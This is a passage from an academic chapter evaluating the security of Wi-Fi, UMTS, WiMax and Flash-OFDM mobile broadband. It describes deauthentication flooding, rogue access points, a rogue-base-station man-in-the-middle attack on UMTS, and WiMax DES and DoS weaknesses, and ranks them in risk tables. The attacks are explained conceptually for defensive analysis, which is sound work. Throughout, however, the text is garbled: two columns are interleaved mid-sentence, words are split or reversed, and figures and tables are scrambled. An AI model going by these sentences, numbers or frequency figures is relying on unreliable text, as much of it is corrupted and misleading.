after the end of the wireless session, the access packet-switched case. The visitor location regis-
point or client has to send a disassociation frame ter (VLR) and the serving GSN keep track of all
to terminate the connection. The frames of these mobile stations that are currently connected to
messages are broadcasted and can be sniffed by an the network. Every subscriber can be identified
attacker.Theattackercanthenood fl the
by itsnetwork
international mobile subscriber identity
with spoofed disassociation frames every time the (IMSI). In order to protect against profiling - at
client tries to join the network, thus disrupting the tacks, this permanent identifier is sent over t
association process and the network access. air interface as infrequently as possible. What is
more, locally valid temporary mobile subscriber
Authenticated / Deauthenticated Storm identities (TMSI) are used to identify subscribers
whenever possible. Every UMTS subscriber has a
The aforementioned principle can be exploited in dedicated home network with which the subscriber
order to disconnect a client and try to keep the cli- shares a long term secret key Ki. The home location
ent disconnected. This technique starts by sending register (HLR) keeps track of the current location
a spoofed deauthentication frame followed by a of all subscribers of the home network. Mutual
disassociation frame in order to make sure that the authentication between a mobile station and a
client has disconnected from the legitimate access visited network is carried out with the support of
point. In a more advanced version of this attack, the current serving GSN (SGSN) or the mobile
a fake probe request and some beacon frames are switching center (MSC)/VLR respectively.
transmitted in order to force the client to connect The new series of 3.5G mobile telephony
to a rogue access point which ignores or monitors technologies, known as high speed packet access
theclient’straffic. (HSPA), will provide more bandwidth to the end-
user, improved network capacity to the operator,
uMts and enhanced interactivity for data applications.
HSPA refers to the improvements made in the
Universal mobile telecommunications system UMTS downlink, known as high speed downlink
(UMTS) is one of the third generation (3G) wire- packet access (HSDPA), and the UMTS uplink,
less cellular technologies for mobile communica- usually referred to as high speed uplink packet
tion. Mobile devices like smartphones, laptops, access (HSUPA) but also referred to as enhanced
and handheld computers can be used. UMTS is dedicated channel (E-DCH).
standardized by the 3G partnership project (3GPP) HSDPA provides a bandwidth of 14.4 Mbps/
and it is mainly deployed in Europe and Japan. user. For multiple-input-multiple-output (MIMO)
Theoretically UMTS supports up to 1920 Kbps systems up to 20 Mbps can be achieved. Both
data transfer rates, but currently the real world per- HSDPA and HSUPA can be implemented in
formance can reach 384 Kbps. It uses the W-code the standard 5 MHz carrier of UMTS networks
division multiple access (CDMA) technology over and can coexist with original UMTS networks.
two 5 MHz channels, one for uplink and one for As HSPA specifications refer only to the access
downlink.Thespecificfrequencybandsoriginally network, there is no change required in the core
definedbytheUMTSstandardareMHz 5 20 - 8 1 network (CN) except from the high data-rate links
for uplink and 2110-2200 MHz for downlink. required to handle the increase in clients’ tr
In UMTS network topology, a mobile station generated by HSPA.
is connected to a visited network by means of a
radio link to a particular base station (Node B). security Architecture
Multiple base stations of the network are con-
nected to a radio network controller (RNC) and The 3G security architecture is based on GSM, but
multiple RNCs are controlled by a general packet certain improvements are added in order to correct
radio service (GPRS) support node (GSN) in the the described security vulnerabilities.

Authentication ality. The encryption process of UEA is based on

the f8 algorithm. One of the main improvements
Authentication and key agreement (AKA) is the of UMTS is that the link layer encrypted chan-
main security protocol of UMTS in the 3GPP nel is established between the MS and the GSN
specification.AccordingtoAKA,amobiledevice instead of the BS, as in GSM. Furthermore, UEA
and a base station have to authenticate each other. is utilized to protect not only the data channels but
Figure 1 provides an overview of the AKA process. also certain signalling channels.
The authentication vector includes the following For user confidentiality UMTS utilizes the
components: same mechanism as GSM. Instead of the IMSI,
a temporary identity (TMSI) assigned by VLR is
a. A random number (RAND) used to identify the subscriber in the communica-
b. An expected response (XRES) tion messages exchanged with the BS. However,
c. A cipher key (CK) the IMSI is still transmitted in clear-text over the
d. An integrity key (IK) air while establishing the TMSI. This has been
e. An authentication token (AUTN) proved to be a starting point for security attacks
against UMTS.
RAND and XRES are utilized by the network Data integrity in 3GPP is assured explicitly
to authenticate the mobile station (MS), whereas through the UMTS integrity algorithm (UIA).
AUTN is utilized by the MS to authenticate the The UIA operation is based on the f9 algorithm.
network. After the mutual authentication, the two UIA is utilized to protect both communication
communicating parties can agree on the CK and and signalling. UEA and UIA are presented in
the IK which will be used throughout the rest of Figure 2.
the session.
gsM compatibility
Confidentiality and Integrity
UMTS has been designed to be backwards
UMTS employs the UMTS encryption algorithm compatible with GSM. It includes standardized
(UEA)inordertoprovideinformation-confidenti security features in order to ensure world-wide
interoperability and roaming. More specifically,
GSM user parameters are derived from UMTS
Figure 1. 3GPP authentication and key agreement parameters using a set of predefined conversion
(AKA) functions. However, GSM subscribers roaming in
3GPP networks are supported by the GSM security
context, which is vulnerable to the aforementioned
GSM vulnerabilities.
Security Vulnerabilities
G3 securityhasbeensignificantlyimproved - com
pared to GSM. However, there are still vulnerabili-
ties related to the backwards compatibility with
GSM. Meyer and Wetzel (2004a, 2004b) present
a man-in-the-middle attack which can be mounted
even if the subscriber utilizes a 3G enabled device
within a 3G base station coverage. The described
attack goes far beyond the anticipations of the
3GPP group. UMTS subscribers are vulnerable

Figure 2. UMTS encryption and integrity algorithm
to what 3GPP calls a “false base station attack” to obtain a valid authentication token AUTN from
even if subscribers are roaming in a pure UMTS any real network. It is assumed that the attacker
network and even though UMTS authentication has already retrieved the IMSI of the targeted
is applied. subscriber, since the latter is sent in clear-text
This attack can be categorized as a “roll-back when establishing a TMSI. The attacker can cap-
attack.” This category of attacks exploits weak- ture the AUTN by initiating the AKA procedure
nesses of old versions of algorithms and protocols with any legitimate network. The next step is to
by means of the mechanisms defined to ensure impersonate a valid GSM base station to the victim
backward compatibility of newer and stronger mobile station. The mobile station connects and
versions. According to this technique, the attacker verifies the rogue BS, since it possesses a valid
acts on behalf of the victim’s mobile station in order AUTN.Subsequently,therogueBSisconfigured

by the attacker to utilize “no encryption” or weak • Authentication: The baseline authentication
encryption. Finally, the attacker can send to the architecture, by default, employs a public
mobile station the GSM cipher mode command key infrastructure (PKI) based on X.509
including the chosen encryption algorithm. The certificates. The
base station (BS) validates
man-in-the-middle attack is mounted and the the client’s certificate before permitti
attacker can use passive or active eavesdropping access to the physical layer (see Figure 3).
without being detected. First, the subscriber station (SS) sends to the
BS an authorization request containing the
certificate,theavailablesecuritycapabilit
wIMAx and the securityassociationidentifierSAID) ( .
TheBSverifiesthecertificateandgeneratesa
The IEEE 802.16 or broadband wireless access 128 bit authentication key (AK). Then, the BS
(BWA) Working Group was established in 1999 sends to the SS an authorization reply, which
to prepare specifications for broadband wireless contains the AK encrypted with SS’s public
metropolitanareanetworks.Thefirst - stan
6 1 2. 0 8 key, the AK’s lifetime, the selected security
dard was approved in December 2001 and was suite, and an AK sequence number. The SS
followed by three amendments: 802.16a, 802.16b uses its private key to recover the AK, which
and 802.16c. In 2004 the 802.16-2004 standard can now be utilized as an authentication token
(IEEE-SA, 2006) was released and the earlier in further communication.
802.16 documents including the a/b/c amendments • Key exchange: The SS and the BS can agree
were withdrawn. An amendment to the standard on a transport encryption key (TEK), which
802.16e (IEEE-SA, 2006) addressing mobility will be utilized for data encryption (see Figure
was introduced in 2005. The main additions of 3).
the 802.16e were low density parity check (LDPC) TEK is randomly generated by the BS. The
codes at the physical layer, enhanced MIMO setup AK established during authentication is used
functions, new states for MS operation, param- to derive two additional keys:
eter-definedpowersavingclassesofmobiles, ° andMessage authentication key (HMAC
enhanced FFT sizes for scalable OFDMA. key), which is utilized to provide mes-
WiMax aims at providing high data rate triple- sage integrity and AK confirmation
play wireless services to fixed users, to nomadic during the key exchange process.
users, and to users of mobile devices. It is based on ° Key encryption key (KEK), which is
a low latency qualityofserviceQoS) ( architectureutilized for encrypting the TEK before
in order to provide real-time multimedia services. It sending it back to the SS. The modes
operates on the 2-6 GHz (IEEE802.16e) and 10-66 for encrypting TEK are:
GHz (IEEE802.16-2004) frequency bands and it a. 3DES with a 112 bit KEK
uses the OFDMA technology for modulation and b. AES with a 128 bit KEK
medium access. c. RSA using SS’s public key
• Data encryption and integrity: The modes
security Architecture for implementing data privacy are:
° Data encryption standard (DES) with
WiMax has been designed with security in mind, a 56 bit key and cipher block chaining
especially after the serious vulnerabilities dis- (CBC), which utilizes the Initializa-
covered in the original Wi-Fi security protocol. tion Vectors obtained during Key Ex-
TheIEEEspecifications
6 1 2. 0 8 includeasecurity change,
sublayer within the MAC layer. The IEEE 802.16 ° AES with a 128 bit key and counter
security architecture is based on the following mode with cipher block chaining mes-
issues: sage authentication code protocol, which

Figure 3. WiMax authentication and key exchange process
provides message integrity and replay in WiMax. The attacker must transmit at the same
protection. time as the legitimate BS using a much higher
power level in order to “hide” the legitimate signal.
Security Vulnerabilities Furthermore, WiMax supports mutual authentica-
tion at user network level based on the generic
WiMax supports unilateral device level authentica- extensible authentication protocol (EAP) (Aboba,
tion (Barbeau, 2005), which can be implemented Blunk, Vollbrecht, Carlson, & Levkowetz, 2004).
inasimilarwayasWi-FiMACfilteringbased EAP onvariants, EAP- transport layer security (TLS)
the hardware device address. Therefore, address ( X.
certificate
0 9 5 based)Aboba
( Simon,
& )91
sniffing and spoofing make a MS masquerade and EAP-subscriber identity module (SIM) (Ha-
attack possible. In addition, the lack of mutual verinen & Salowey, 2004), are supported.
authentication makes a man-in-the-middle attack In the data privacy domain, the main security
from a rogue BS possible. However, a successful threat is the transmission of unencrypted manage-
man-in-the-middle attack is difficult ment because messages of over the wireless link. Eavesdrop-
the time division multiple access (TDMA) model ping of management messages is a critical threat for

users and a major threat to a system. For example, efficient packet switching over the air interfac
an attacker could use this vulnerability to verify Given segments can be dedicated for use with
the presence of a victim at its location before predefinedfunctionality.Thusthereisnoneedto
perpetrating a crime. Additionally, it might be send overheads, such as message headers. There-
used by a competitor to map the network. Another fore, networklayertrafficexperiencessmalldelays
major vulnerability is the encryption mode based andnosignificantdelayjitter.
on DES. The 56 bit DES key is easily broken by
brute force with modern computers. Furthermore, security Architecture
the DES encryption mode includes no message
integrity or replay protection functionality and is The security relies on “defence in depth,” that is,
thus vulnerable to active or replay attacks. The virtual private network (VPN) tunnelling and end-
secure AES encryption mode should be preferred to-endencryptionareused.Securityspecifications
over DES. forash-
fl OFDMhavenotbeenpresentedinpublic
Finally, there is a potential for DoS attacks (Lehtonen, Ahonen, Savola, Uusitalo, Karjalainen,
because authentication operations trigger the ex- Kuusela et al., 2006).
ecution of long procedures. For example, a DoS
attack could ood fl a MS with a high number of
Security Analysis
messages to authenticate. Due to low computational
resources, the MS will not be able to handle a large A security analysis of the mobile broadband tech-
amount of invalid messages, rendering the DoS nologies Wi-Fi, UMTS, and WiMax is presented.
attack successful. Inclusionofash- fl OFDMinthiscomparisonisnot
possible because of the unavailability of public
securityspecifications.Threatsareanalyzedwit
flAsH-ofdM respect to the likelihood of occurrence, the impact
on the network operation, and the global risk they
Fast low-latency access with seamless handoff represent. In the following paragraphs, we first
orthogonalfrequencydivisionmultiplexing describe ash-
fl ( in detail the evaluation and comparison
OFDM) is an OFDM-based proprietary system methodology, and then a group of tables is presented
whichspecifiesthephysicallayer,aswell inas
which higher the security threats of the investigated
protocol stack layers. It is an all IP technology technologies are evaluated. Security threats are
and it aims to compete with GSM/3G networks. classified based on four main axes: -authentica
Already implemented ash- fl OFDM technology
tion, confidentiality, integrity, and physical laye
operating in the 450 MHz frequency band can resilience. Finally, the security evaluations of the
offer a maximum download speed of 5.3 Mbps studied technologies are compared and presented
and an upload speed of 1.8 Mbps. in a concise overview table.
Design objectives have included design of a
high capacity physical layer, a packet-switched Methodology
air interface, a contention-free and QoS-aware
MAClayer,andefficientoperationsusing existing
The evaluation and comparison methodology was
Internet protocols. The air interface is designed based on the method described by Barbeau, (2005)
and optimized across all protocol stack layers. and ETSI.) 302 (More specifically, three main
Fast hopping across all tones in a pseudorandom criteria are considered: likelihood, impact, and
predetermined pattern is employed. Channel risk. “Likelihood” refers to the probability that
coding and modulation are carried out on a per- anattackassociatedwithaspecific - threatiss
segment basis and can be individually optimized cessfully launched. In this context, two variables
for each channel. The ability to send segments of are considered:
arbitrary size enables the MAC layer to perform

a. The technical difficulties of mounting the criteria, that is, likelihood, impact,
the evaluation
attack in terms of the required software, and risk. The comparison axes are authentica-
hardware, and estimated time duration. tion, confidentiality, integrity, and physical laye
b. The attacker’s motivation in terms of the level resilience.
of network access or the severity of the system
malfunction that the attack achieves. objective-based comparison
Three levels of likelihood are available as This section applies the aforementioned methodol-
described in Table 1. “Impact” refers to the conse- ogy on four main objectives of wireless security
quences of an attack in terms of user and network architectures:authentication,confidentialit -
security. The two variables of impact are: rity, and physical layer resilience. For each objec-
tive, a thorough discussion describes the rationale
a. User impact in terms of the severity of network behind the ranking of the security threats.
access degradation.
b. System impact in terms of the severity of
network degradation or outage. Authentication Evaluation
Three levels of impact are available as described Wi-Fi includes four security threats which are all
in Table 1. According to the level of likelihood ranked to have a high impact on the system, since
and impact, numerical values from a predefined the attacker can exploit them to override the authen-
range are assigned to each criterion (see Table 1). tication checks or launch a combination of attacks
Foraspecificthreat,the“risk”refersto anwill
which overall
grant him full network access. However,
threat level which is determined by the product of the likelihood ranking greatly varies. Closed system
the likelihood value and impact value. authenticationandMACfilteringareverylikelyt
Security threats which result in a high evalu- beattackedbysniffingsoftwarewhichisreadily
ated risk value are critical and additional measures available on the Internet. WEP attacks are more
should be taken to protect the network perimeter, complicated, because a combination of software
whereas threats which have a low risk can be toler- isrequiredtoinduceandcapturenetworktraf
ated without employing countermeasures. and then exploit the weak IVs in order to crack the
In this point, it is worth noting that this quantita- key.WPA-PSKisevenmoredifficulttobreaksince
tive ranking is subjective. However, this is a useful it requires a brute force attack. The resilience of
evaluation and comparison methodology which WPA-PSK is greatly dependent on the length and
can stimulate a structured discussion based on the complexity of the preshared key.
UMTS is far more resilient to authentication
attacks, since most of the security gaps have
Table 1. Evaluation and comparison methodology been identified during the deployment of GSM
Variables andtackledinthespecificationdesignofUMTS.
Criteria Cases Difficulty Motivation Rank However, UMTS includes two main authentication
Unlikely Strong Low 1
Likelihood Possible Solvable Reasonable 2 vulnerabilities which can be exploited to launch a
Likely None High 3 man-in-the-middle attack (high impact). The IMSI
User System
Low Annoyance
Very limited
1
hijack threat refers to the deployment of a rogue BS
outages
Loss of Limited in order to initiate an authentication procedure and
Impact Medium 2
service outages steal the IMSI of a mobile user. The motivation for
Long time Long time
High 3
loss of service outages this attack is high, but the equipment is expensive
Risk = Likelihood x Impact
andcomplicatedtoconfigure.AUTNcaptureisthe
Minor No need for countermeasures 1-3 second step of the attack and it refers to capturing
Risk Major Threat need to be handled 3-6
Critical High priority 6-9
an authentication token by masquerading a MS.

It assumes that the IMSI Hijack attack has been can be easily established, but it cannot greatly affect
already successfully launched. However, this attack the system if robust authentication and integrity
does not require the deployment of a rogue BS and mechanisms have been deployed.
therefore it is more possible to happen.
In the WiMax architecture, the main security Integrity Evaluation
threat is the device-level authentication mode.
When this mode is utilized without Wi-Fi certificate
supports null mode which leaves the mes-
support,itisasvulnerableasMACfiltering and
sagestotally unprotectedagainstmodification
it can be exploited to launch MS or BS masquer- replay attacks. WEP CRC-32 integrity mechanism
ading attacks. A less critical vulnerability is the provides a moderate level of protection, but there
DoS attack which can be launched by ooding fl is no replay protection and the integrity protection
authentication requests. This attack mostly affects can be overridden by an experienced attacker.
the MS due to its limited processing resources, The UMTS architecture includes a major short-
but it is not a major threat since it has a medium coming, namely the inadequate replay protection
impact and a low motivation. of authentication tokens. This vulnerability can
have a high impact since it allows the reuse of the
Confidentiality Evaluation token retrieved by an AUTH capture attack and the
completion of the UMTS man-in-the-middle attack.
Wi-Fi includes some major vulnerabilities. It sup- However, it requires a prior successful launch of
portsanullmodeencryptionwhichisconfigured IMSI hijack and AUTN capture. Therefore it results
as default in the majority of the commercial access inahightechnicaldifficulty.
points. WEP encryption can provide an elementary WiMax supports two modes that can greatly
level of protection, but it is still too weak to keep compromiseinformationintegrity.Thefirstisthe
the intruders out. WPA-PSK offers a satisfactory DES mode which does not support integrity and
levelofconfidentiality,iflongandcomplex replaykeys
protection of data frames. The second is the
are utilized. The ranking of the Wi-Fi - confiden
null MAC mode for management frames, which can
tiality vulnerabilities is similar to authentication allowtheintrudertoinjectmodifiedmanagemen
ranking, since both objectives are based on the frames and affect the network operation.
same mechanisms.
UMTS incorporates strong encryption algo- Physical Layer Resilience Evaluation
rithms which have eliminated the deficiencies of
its predecessor GSM. Nevertheless, the backwards The resilience of the physical layer of each tech-
compatibility with GSM can be exploited to com- nology is evaluated with respect to jamming and
promise dual-band mobile devices by launching a scrambling. Jamming is achieved by introducing
man-in-the-middle attack. In this attack, the rogue a source of noise strong enough to significantly
BS can mandate the MS to use null mode encryp- reduce the capacity of the channel. Scrambling
tion or one of the GSM encryption modes which is similar to jamming, but it takes place for short
can be easily broken (Biham & Dunkelman, 2000; intervalsoftimeanditistargetedtospecificfra
Biryukov, Shamir, & Wagner, 2000). However, this or parts of frames.
is an unlikely attack since it requires the deploy- Wi-Ficomprisesofthethreedifferent - specifi
ment of a BS and a prior successful launch of the cations IEEE 802.11a/b/g which all utilize random
IMSI hijack and AUTN capture attacks. medium access techniques but operate on differ-
WiMax security architecture includes two main ent physical channels. IEEE 802.11a/g operate on
shortcomings. First of all, the DES encryption a 5 MHz OFDM channel, whereas IEEE 802.11b
modeprovidesaninadequatelevel - ofconfidential
operates on a 5 MHz DSSS channel. The DSSS
ity, since it can be easily broken. In addition, the is more resilient to narrowband jamming than
eavesdropping of unencrypted management frames OFDM and therefore jamming has a higher impact
0
on IEEE802.11a/g. However, if the attacker wants are much more secure, but the poor usability and
to jam all the channels, the attacker has to jam a the limited security awareness have constrained
bandwidth of 40 MHz, which is quite difficult. their wide deployment. UMTS proved to be quite
Scrambling is easier to launch because of the robust by eliminating the security inefficiencie
random medium access layer. of its predecessor GSM. However, an attacker can
UMTS operates on two 5 MHz DSSS chan- still exploit some backward-compatibility issues
nels, one for the uplink and one for the downlink. to launch a man-in-the-middle attack. WiMax’s
It is resilient to narrowband jamming because of performance was not satisfactory enough mainly
the DSSS modulation, but it is still vulnerable to due to the provision of weak security modes.
scrambling because of the random access. Nevertheless, the practical performance is greatly
WiMax operates on a 1.25-20 MHz OFDM dependent on the actual security decisions of the
channel and it employs TDMA techniques. Thus, network operators. These decisions vary according
it can be vulnerable to jamming especially if it to the provided service requirements.
operates on a narrow channel, but it is resilient to
scrambling due to the TDMA.
ovErAll coMPArIson Table 2. Security evaluation

AUTHENTICATION EVALUATION
The results from authentication, confidentiality, Technology Threat
Closed System
Likelihood
3
Impact
3
Risk
9
integrity, and physical layer resilience evaluation Wi-Fi
MAC Filtering 3 3 9
WEP 2 3 6
are presented in Table 2. WPA-PSK 1 3 3
As follows, the overall comparison results: Average Risk 6,75
IMSI Hijack 2 3 6
UMTS
AUTN Capture 1 3 3
Average Risk 4,5
• Wi-Fi: Device-level Authentication 3 3 9
WiMAX
° Authentication: 6.75 DoS on MS 2 2 4
° Confidentiality: 6 Average Risk
CONFIDENTIALITY EVALUATION
6,5
° Integrity: 6 Technology Threat Likelihood Impact Risk

Null 3 3 9
° PHY Resilience: 5 Wi-Fi WEP 2 3 6
WPA-PSK 1 3 3
° AVERAGE RISK: 5.94 Average Risk 6
• UMTS UMTS Rogue BS – Null / Weak 1 3 3
Average Risk 3
° Authentication: 4.5 DES mode 3 3 9
° Confidentiality: 3
WiMAX
Management Frames 3 1 3
Average Risk 6
° Integrity: 3 INTEGRITY EVALUATION
Technology Threat Likelihood Impact Risk
° PHY Resilience: 3.5 Null 3 3 9
Wi-Fi
° AVERAGE RISK: 5.94 WEP 1 3 3
Average Risk 6
• WiMax UMTS AUTN Replay 1 3 3
° Authentication: 6.5 Average Risk
DES mode – Null integrity 3 2
3
6
° Confidentiality: 6 WiMAX
Management Frame-Null MAC 3 3 9
Average Risk 7,5
° Integrity: 7.5 PHYSICAL LAYER RESILIENCE EVALUATION
° PHY Resilience: 3 Technology Threat Likelihood Impact Risk
Jamming (IEEE 802.11a/g) 2 3 6
° AVERAGE RISK: 5.75 Scrambling (IEEE 802.11a/g) 3 3 9
Wi-Fi
Jamming (IEEE 802.11b) 2 2 4
Scrambling (IEEE 802.11b) 3 2 6
Wi-Fi has the highest average risk, which is quite Average Risk 5
Jamming 1 2 2
reasonable because of the initial lack of security UMTS
Scrambling 2 2 4
mechanisms in the Wi-Fi specification and the Average Risk 2,5
Jamming 1 3 3
subsequent failure of WEP. WPA and WPA2 modes WiMAX
Scrambling 1 3 3
Average Risk 3

futurE trEnds user data rates exceeding 1 Mbps at speeds of up

to052km/h. A draft version of the specification
Broadband wireless access networking is pres- was approved in January 18, 2006.
ently a rapidly evolving ICT area. Three important
developmenttrendscanbeidentified: 4g – future wireless cellular
technology
• WiMax evolution for long range broadband
wireless access. Frameworks for future 4G networks, which seam-
• Development of a broadband wireless access lessly integrate heterogeneous mobile technologies
technology supporting high speed mobility. in order to provide enhanced service integration,
• Emerging 4G wireless cellular technology. QoS,exibility,
fl scalability,mobility,andsecurity,
are currently being developed. However, these
wiMax Evolution frameworks raise security vulnerabilities. An
international consortium presents requirements
TheWiMaxstandardwasfinalizedinJuneand 0 2. 4 recommendations for the evolving 4G mobile
WiMax has the potential to change telecommu- networking technology (Akhavan, Vivek Badri-
nications as it is known today. “It eradicates the nath, & Geitner, 2006). The 4G technology, which
resource scarcity that has sustained incumbent is at its infancy, is supposed to allow data transfer
service providers for the last century. As this up to 100 Mbps outdoor and 1 Gbps indoor. The
technology enables a lower barrier to entry, it International Telecommunications Union (ITU)
will allow true market-based competition in major defines4Gasdownlinkthroughputof0Mbps 1
telecommunications services like voice, video and or more, and corresponding uplink speeds of at
data” (Ohrtman, 2005). least 50 Mbps.
WiMax can offer a point-to-point range of 50 The 4G technology will support roaming for
km with a throughput of 72 Mbps. The WiMax interactive services such as video conferencing. The
technology will make personal broadband services cost of the data transfer will be comparatively low
profitabletoserviceprovidersandwill and be available
global mobility will be possible. The networks
to business and consumer subscribers at afford- will be all IPv6 networks. WLAN, 2.5G, 3G, and
ableprices.ThefirstmobileWiMaxproducts otherare networks such as SATCOM, WiMAX, and
expected to be introduced into the market in the Bluetooth will be integrated in 4G networks. The
first quarter of . 027 New technologies such as will be much smarter and improved ac-
antennas
MIMO and beam forming for higher throughput cess technologies like OFDM and MC-CDMA will
and capacity will be introduced in 2007 (WiMax beused.Moreefficientalgorithmsatthephysical
Forum, 2006). layer will reduce the inter-channel interference
and cochannel interference.
Mobile broadband wireless Access
(MbwA) Security Issues
The IEEE 802.20 (or MBWA) Working Group was Seamless convergence of heterogeneous wireless
established in December 11, 2002, with the aim to networks provides new security challenges for
developaspecificationforanefficientpacket- based
the research community. Global authentication
air interface that is optimized for the transport of architectures are needed which can operate in-
IP based services. The goal is to enable worldwide dependently of the wireless physical protocol. In
deployment of affordable, always-on, and interop- addition,specificationsareneededformaintaini
erable BWA networks. The group will specify the confidentiality and the integrity - of the com
the lower layers of the air interface, operating in munication data while the user terminal is in a
licensed bands below 3.5 GHz and enabling peak hand-off state. In this direction, a forum of mobile

operatorscalledfixedmobileconvergence alliance
likelihood, impact, and risk. The methodology
(FMCA)isworkingondefiningspecifications forapplied on four evaluation axes: authentica-
was
the convergence of heterogeneous networks in the tion, confidentiality, integrity, and physical laye
context of all IP 4G wireless systems. resilience. According to the comparison results,
Security policy issues are: Wi-Fi is more liable to security attacks, followed
by WiMax and UMTS. However, WiMax has not
• The use of lightweight and exible fl - authen
been widely tested under real-world systems due
tication, authorization, account, and audit to its recent release. More security vulnerabilities
(AAAA) schemes, may therefore be discovered in the future. Finally,
• The use of Trusted Computing (Reid, Nieto, the security architecture of UMTS is quite robust
& Dawson, 2003), and because of the lessons learned from GSM, but it is
• Different security polices for different still not invincible against an experienced attacker
services are recommended for 4G systems with the right equipment.
(Zheng, He, Xu, & Tang, 2005a).
Several security architecture proposals for 4G rEfErEncEs

wireless systems have been made:
Aboba, B., Blunk, L., Vollbrecht, J., Carlson, J., &
• Zheng, He, Yu, and Tang (2005b) propose a Levkowetz, H. (2004). Extensible authentication
security architecture with: protocol (EAP) (IETF RFC 3748).
° Network access security features.
° Network area security features for secure Aboba, B., & Simon, D. (1999). PPP EAP TLS
data exchange between network nodes. authentication protocol (IETF RFC 2716).
° User area security features for secure Akhavan, H., Vivek Badrinath, V., & Geitner, T.
access to ME/USIM. (2006). Next generation mobile networks beyond
° Application security for secure end-to- HSPA & EVDO (White Paper.NGMN—Next
end data exchange. generation mobile networks Ltd.) Retrieved April
• Integration of the SSL security protocol and 24, 2007, from http://www.ngmn.org/
a public key infrastructure is outlined and
evaluated by Kambourakis, Rouskas, and Baek, K., Smith, W., & Kotz, D. (2004). A survey
Gritzalis (2004). of WPA and 802.11i RSN authentication protocols
• A hierarchical trust model for 4G wireless net- (Tech. Rep. TR2004-524). Dartmouth College,
works is proposed by Zheng et al. (2005a). Computer Science.
Barbeau, M. (2005). WiMax/802.16 threat analysis.
In Proceedings of the 1st ACM Workshop on QoS
conclusIon and Security for Wireless and Mobile Networks
(Q2SWinet), Montreal, (pp. 8-15).
In this chapter, the dominant mobile broadband
technologies have been evaluated and compared Biham, E., & Dunkelman, O. (2000). Cryptanalysis
based on their security performance. Three tech- of the A5/1 GSM stream cipher. In Proceedings of
nologies were taken into consideration: Wi-Fi, the First International Conference on Progress in
UTMS, and WiMax. Their security architectures Cryptology (pp. 43-51).
have been presented and analyzed in order to Biryukov, A., Shamir, A., & Wagner, D. (2000).
highlight the main security deficiencies. Real time Thecryptanalysis of A51 / on. a PC
Paper
evaluation and comparison methodology was presented at the Fast Software Encryption Work-
based on assigning qualitative rankings to secu- shop 2000, New York.
rity threats with respect to the following criteria:

Borisov, N., Goldberg, I., & Wagner, D. (2001). on the security of interoperating GSM/UMTS
Intercepting mobile communications: The inse- networks. In Proceedings of IEEE International
curity of 802.11. In Proceedings of the 7th Annual Symposium on Personal, Indoor and Mobile Radio
International Conference on Mobile Computing Communications (PIMRC2004).
and Networking, Rome, (pp. 180-189).
Meyer, U., & Wetzel, S. (2004b). A man-in-the-
Edney, J., & Arbaugh, W. A. (2003). Real 802.11 middle attack on UMTS. In Proceedings of ACM
security: Wi-Fi protected access and 802.11i (1st Workshop on Wireless Security (WiSe 2004).
ed.). Addison-Wesley Professional.
Ohrtman, F. (2005). WiMax handbook. Building
ETSI. (2003). TechnicalspecificationETSITS6 1 2.80 wireless
1 networks.McGraw-Hill Com-
V41 5- 6 .1 . 1 . munications.
Haverinen, H., & Salowey, J. (2004). Extensible Reid, J., Nieto, J., & Dawson, E. (2003). Privacy
authentication protocol method for GSM subscriber and trusted computing. In Proceedings of the 14th
identity modules (EAP-SIM) (Internet draft [work International Workshop on Database and Expert
in progress]). Internet Engineering Task Force. Systems Applications (pp. 383-388).
IEEE. (2001). IEEE standards for local and met- Stanley, D., Walker, J., & Aboba, B. (2005). Ex-
ropolitan area networks: Standard for port based tensible authentication protocol (EAP) method re-
network access control. IEEE Std 802.1x-2001. quirements for wireless LANs (IETF RFC 4017).
Retrieved April 24, 2007, from http://standards.ieee.
Stubblefield,A.Ioannidis,
, J.Rubin,
&, A..) 02 (
org/getieee802/download/802.1X-2001.pdf
Using the Fluhrer, Mantin, and Shamir attack to
IEEE-SA. (2006). IEEE 802.16 LAN/MAN broad- break WEP. Paper presented at the NDSS.
band wireless LANS. IEEEstandards.
6 1 .2 08 Re-
Van de Wiele, T. (2005). Wireless security: Risks
trieved April 24, 2007, from http://standards.ieee.
and countermeasures (UNISKILL Whitepaper).
org/getieee802/802.16.html
Welch, D. J., & Lathrop, S. D. (2003). A survey
Kambourakis, G., Rouskas, A., & Gritzalis, S.
of 802.11a wireless security threats and security
(2004). Performance evaluation of public key-based
mechanisms (Tech. Rep. ITOC-TR-2003-101).
authentication in future mobile communication
United States Military Academy.
systems. EURASIP Journal on Wireless Commu-
nications and Networking, 1, 184-197 WiMax Forum. (2006). Mobile WiMax—Part I:
A technical overview and performance evala-
Lehtonen, S., Ahonen, P., Savola, R., Uusitalo, I.,
tion. Retrieved April 24, 2007, from http://www.
Karjalainen, K., Kuusela, E., et al. (2006, Septem-
wimaxforum.org/home/
ber). Information security in wireless networks.
Ministry of Transport and Communication. Finland: Zheng, Y., He, D., Xu, L., & Tang, X. (2005a). Se-
LUOTI Publications. ISBN 952-201-783-3. Retrieved curity scheme for 4G wireless systems. In Pro-
April, from
4 7 20 http:www.
/ luoti.fi/material/ ceedings of 502 International Conference on
InfoSec_in_WNetworks_final.pdf Communications, Circuits and Systems (Vol.
1, pp. 397-401).
Lynn, M., & Baird, R. (2002). Advanced 802.11
attack. Paper presented at the Black Hat 2002 Con- Zheng, Y., He, D., Yu, W., & Tang, X. (2005b). Trust-
ference, Las Vegas. Retrieved April 24, 2007, from ed computing-based security architecture for 4G
http://www.blackhat.com/presentations/bh-usa-02/ mobile networks. Paper presented at the Sixth
baird-lynn/bh-us-02-lynn-802.11attack.ppt International Conference on Parallel and Distrib-
uted Computing, Applications and Technologies
Meyer, U., & Wetzel, S. (2004a). On the impact of
PDCAT 2005 (pp. 251-255).
GSM encryption and man-in-the-middle attacks

kEy tErMs UMTS: Universal mobile telecommunication

system (UMTS) is a global third generation wire-
less cellular network for mobile telephony and data
Authentication: Verification of the identity
communication with a bandwidth up to 2 Mbps
of a user or network node who claims to be le- which can be upgraded up to 20 Mbps with high
gitimate. speed packet access (HSPA).
Broadband: A network connection with a Wi-Fi: Wireless local area networking based
bandwidth of about 2 Mbps or higher. on IEEE 802.11 standards.
Confidentiality: A cryptographic security ser- WiMax: Wireless metropolitan area network-
vice which allows only authorized users or network ing based on IEEE 802.16 standards.
nodes to access information content.
WPA, WPA2: Wi-Fi protected access (WPA)
EAP: Extensible authentication protocol (EAP) is a protocol to secure wireless networks created
is an authentication protocol used with 802.1X to to patch the previous security protocol WEP.
pass authentication information messages between WPA implements part of and WPA2 implements
a suppliant and an authentication server. the entire IEEE 802.11i standard. In addition to
Integrity: A security service which verifies authentication and encryption, WPA also provides
that stored or transferred information has remained improved payload integrity.
unchanged.

Chapter XLIX
